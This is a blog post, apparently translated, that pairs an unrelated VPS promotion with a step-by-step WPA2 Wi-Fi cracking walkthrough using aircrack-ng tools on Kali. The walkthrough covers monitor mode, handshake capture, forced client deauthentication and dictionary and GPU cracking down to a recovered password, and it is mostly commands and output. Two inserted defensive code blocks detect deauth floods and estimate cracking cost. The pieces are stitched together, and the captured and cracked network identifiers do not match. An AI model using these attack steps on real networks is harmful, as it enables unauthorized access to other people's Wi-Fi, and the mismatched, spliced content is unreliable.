On the road ……

Linux system operations and architecture

The hosts-file trick I used before was never very stable, and I also worried about getting hacked in all sorts of ways. I happened to see that bwg has a $9.9/year VPS, which is just right for running an ss server.
Without further ado I ordered one. The network at the Los Angeles datacenter is quite good; pinging it from my home China Telecom line stays at around 180 ms:

PING 104.194.78.170 (104.194.78.170): 56 data bytes
64 bytes from 104.194.78.170: icmp_seq=0 ttl=52 time=185.181 ms
64 bytes from 104.194.78.170: icmp_seq=1 ttl=52 time=185.103 ms
64 bytes from 104.194.78.170: icmp_seq=2 ttl=52 time=187.705 ms
64 bytes from 104.194.78.170: icmp_seq=3 ttl=52 time=184.651 ms
64 bytes from 104.194.78.170: icmp_seq=4 ttl=52 time=184.948 ms
64 bytes from 104.194.78.170: icmp_seq=5 ttl=52 time=185.131 ms
^C
--- 104.194.78.170 ping statistics ---
6 packets transmitted, 6 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 184.651/185.453/187.705/1.022 ms

The VPS specs are only just adequate; the basic configuration is:

  • Disk: 5G SSD;
  • Memory: 512M;
  • CPU: 1x Intel Xeon;
  • Traffic: 500G per month;
  • Bandwidth: 1G;

Bandwagon Host accepts PayPal and supports monthly billing, but paying yearly is clearly the better deal. Good things shouldn't be kept to oneself, so go grab one quickly; word is they will sell out soon. Purchase link: Bandwagon


First you need a machine running Kali Linux, either a virtual machine or physical hardware, plus a wireless card that supports monitor mode.

root@kali:~# iwconfig 
wlan1     IEEE 802.11bg  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

lo        no wireless extensions.

Check the wireless card's device name

root@kali:~# airmon-ng start wlan1


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID     Name
2772    dhclient
4415    wpa_supplicant


Interface       Chipset         Driver

wlan1           Realtek RTL8187L        rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

Enter monitor mode

airodump-ng mon0 lists every wireless network it finds.
Pick the one you want to test, and copy its BSSID.

root@kali:~/test# airodump-ng -w nenew  -c 11 --bssid E4:D3:32:41:56:12   mon0

 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12                                         
                                                                                                                                                                                                   
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                   
 E4:D3:32:41:56:12  -44  53      171        7    0  11  54e. WPA2 CCMP   PSK  TP-LINK_5612                                                                                                         
                                                                                                                                                                                                   
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                         
                                                                                                                                                                                                   
 E4:D3:32:41:56:12  00:00:00:00:00:00    0    0 - 1      0    18135                                                                                                                                 
 E4:D3:32:41:56:12  64:B4:73:40:60:5C  -21    1e- 6e     0        7

When the header shows WPA handshake:, the handshake has been captured and you can move on to cracking.

If you never capture one, the following command attacks the client and forces it to re-handshake:

aireplay-ng -0 10 -a E4:D3:32:41:56:12  -c 64:B4:73:40:60:5C  mon0  --ignore-negative-one
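The forced re-handshake above relies on a burst of 802.11 deauthentication frames, and that burst is exactly what a wireless IDS looks for. The following detector is an added example written for this page, not part of the original post or of the aircrack-ng suite; it runs over a constructed list of management-frame records (timestamp, subtype, source, destination) of the kind a monitor-mode capture parser would emit, and the MAC addresses in the sample are placeholders.

```python
"""Flag a deauthentication flood in a stream of 802.11 management frames.

Added example for a WIDS-style check: a burst of deauth frames from one
source address inside a short window is the signature of a forced
re-handshake. Frame records are constructed here; a real deployment would
feed them from a monitor-mode capture.
"""
from collections import defaultdict, deque

BEACON = 8    # 802.11 management subtype: beacon
DEAUTH = 12   # 802.11 management subtype: deauthentication

# Constructed sample: (timestamp_s, subtype, source_addr, dest_addr).
# Two beacons, then ten deauths at 50 ms spacing, then one more beacon.
SAMPLE_FRAMES = [
    (0.00, BEACON, "E4:D3:32:41:56:12", "FF:FF:FF:FF:FF:FF"),
    (0.10, BEACON, "E4:D3:32:41:56:12", "FF:FF:FF:FF:FF:FF"),
] + [
    (1.0 + i * 0.05, DEAUTH, "E4:D3:32:41:56:12", "64:B4:73:40:60:5C")
    for i in range(10)
] + [
    (2.00, BEACON, "E4:D3:32:41:56:12", "FF:FF:FF:FF:FF:FF"),
]


def detect_deauth_floods(frames, window_s=2.0, threshold=5):
    """Return (timestamp, source, count) alerts.

    An alert fires the first time `threshold` or more deauth frames from one
    source address fall inside a sliding window of `window_s` seconds, and is
    not repeated until that source's burst has drained below the threshold.
    Frames must be supplied in time order.
    """
    recent = defaultdict(deque)   # source address -> timestamps of recent deauths
    alerted = set()               # sources already reported for the current burst
    alerts = []
    for ts, subtype, src, _dst in frames:
        if subtype != DEAUTH:
            continue
        q = recent[src]
        q.append(ts)
        # Drop timestamps that have fallen out of the window.
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold:
            if src not in alerted:
                alerts.append((ts, src, len(q)))
                alerted.add(src)
        else:
            alerted.discard(src)
    return alerts


if __name__ == "__main__":
    for ts, src, n in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"t={ts:.2f}s deauth flood from {src}: {n} frames in window")
```

With the constructed sample the alert fires at the fifth deauth frame (t=1.20 s) and is not repeated for the remaining frames of the same burst; a normal roaming client sends one or two deauths, not ten in half a second, so a threshold around five per two seconds separates the two cases.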

Once the handshake is captured, you can run a dictionary against the password.

root@kali:~/test# aircrack-ng -w ./password.txt  nenew-21.cap 
Opening nenew-21.cap
Read 18654 packets.

   #  BSSID              ESSID                     Encryption

   1  D0:C7:C0:6E:53:53  TP-LINK_5353              WPA (1 handshake)

Choosing first network as target.

Opening nenew-21.cap
Reading packets, please wait...

How fast it runs depends on your machine's performance, and even more on your dictionary.
If you are on a physical machine with a decent graphics card, you can use the GPU to accelerate cracking; it is far more efficient than the CPU.

For installing the graphics driver, SDK and so on under Kali Linux, see the following links:
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html

Using the GPU here, the password came out very quickly:

root@kali:~# pyrit -r nenew-21.cap  -i password.txt -b D0:C7:C0:6E:53:53 attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'nenew-21.cap' (1/1)...
Parsed 14 packets (14 802.11-packets), got 1 AP(s)

Tried 4420221 PMKs so far; 86496 PMKs per second.

The password is 'qq123789'.
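The 86496 PMKs per second above is the real cost that bounds any dictionary attack on WPA/WPA2-PSK: every candidate passphrase must go through PBKDF2-HMAC-SHA1 with the SSID as salt and 4096 iterations before it can be checked against the handshake. The block below is an added example written for this page, not code from the original post or from pyrit; it derives the PMK with Python's standard hashlib (checked against the IEEE 802.11i reference vector for passphrase "password" and SSID "IEEE") and turns the page's own numbers (4420221 PMKs tried at 86496 PMK/s) and a hypothetical random 8-character keyspace into wall-clock estimates, which is the calculation a network owner needs when judging whether a passphrase like the one found above would survive.

```python
"""WPA2-PSK key derivation and dictionary-attack cost estimates.

Added example for this page. The PMK derivation is the standard
PBKDF2-HMAC-SHA1 defined in IEEE 802.11i; the rate and candidate counts
used in the estimates are taken from the pyrit output on the page, and the
36-symbol/8-character keyspace is a hypothetical comparison.
"""
import hashlib
import math

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_LEN = 32               # 256-bit Pairwise Master Key

# Numbers reported by pyrit on this page.
PAGE_PMKS_TRIED = 4420221
PAGE_RATE_PMK_PER_S = 86496


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).

    This is the per-candidate work a cracker must repeat; the AP and client
    compute it once. The iteration count is what keeps the rate in the
    tens of thousands per second even on a GPU.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def seconds_to_exhaust(candidates: int, pmks_per_second: float) -> float:
    """Wall-clock seconds to derive a PMK for every candidate at a given rate."""
    return candidates / pmks_per_second


def keyspace_size(alphabet_size: int, length: int) -> int:
    """Number of passphrases of exactly `length` symbols over an alphabet."""
    return alphabet_size ** length


def years_to_exhaust(candidates: int, pmks_per_second: float) -> float:
    """Same estimate expressed in years, for readability of large keyspaces."""
    return seconds_to_exhaust(candidates, pmks_per_second) / (365 * 86400)


if __name__ == "__main__":
    # Reference vector from IEEE 802.11i (passphrase "password", SSID "IEEE").
    print("PMK(password, IEEE) =", wpa2_pmk("password", "IEEE").hex())

    # How long the page's own run took to reach the hit, at the page's rate.
    print(f"{PAGE_PMKS_TRIED} candidates at {PAGE_RATE_PMK_PER_S}/s: "
          f"{seconds_to_exhaust(PAGE_PMKS_TRIED, PAGE_RATE_PMK_PER_S):.1f} s")

    # Hypothetical comparison: a random 8-symbol passphrase over [a-z0-9].
    space = keyspace_size(36, 8)
    print(f"36^8 = {space} candidates: "
          f"{years_to_exhaust(space, PAGE_RATE_PMK_PER_S):.2f} years to exhaust")
    print("bits of entropy:", round(math.log2(space), 1))
```

The two estimates make the page's point concrete: a passphrase that appears in a wordlist is found in under a minute at this rate, while even a short truly random passphrase pushes an exhaustive search past a year, and a longer one (the 802.11i maximum is 63 characters) makes it infeasible regardless of GPU count.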

Reference: http://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html

